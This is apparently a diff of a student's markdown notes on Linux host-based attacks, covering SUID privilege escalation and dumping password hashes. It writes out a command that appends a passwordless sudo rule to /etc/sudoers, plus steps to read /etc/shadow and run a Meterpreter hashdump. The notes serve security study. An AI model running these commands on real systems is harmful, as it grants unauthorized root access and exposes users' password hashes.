Mads-Power/cyber_security/Host Based Attacks/host_based_attacks.md

 3.  `ls -al /usr/local/share/copy.sh`
 4.  `printf '#!/bin/bash\necho "youraccount ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh`
 ### Exploiting SUID Binaries PRiv esc technique
+- depends on the owner of the SUID binary: needs root privileges.
+- In order to elevate our privileges, we will need to identify an SUID binary that is owned by the "root" user.
-- depends on the owner of the SUID binary: needs root privileges !!THIS DEMO IS ALREADY GOT IN TO THE SYSTEM, THIS IS PRIVESC PART!!
+!!THIS DEMO IS ALREADY GOT IN TO THE SYSTEM, THIS IS PRIVESC PART!!
 "student demo"
 R=READ - W=WRITE - S=SUID - X=EXECUTE -
 1. `groups youraccount`
 2. lists files detailly with hidden files: `ls -al`
 3. ...

+### Dumbping Linux Password Hashes
+-optaining bash session if backdoor exploit: `/bin/bash -i`
+- all encrypted passwords are stored in the: /etc/shadow , root priv
+-  password HASH: $1=MD5 $2=Blowfish $5=SHA-256 $6=SHA-512
+-  !!Gain privilege first and root user!!
+1. if root user: `cat /etc/shadow`
+2. background meterpreter session and `search hashdump`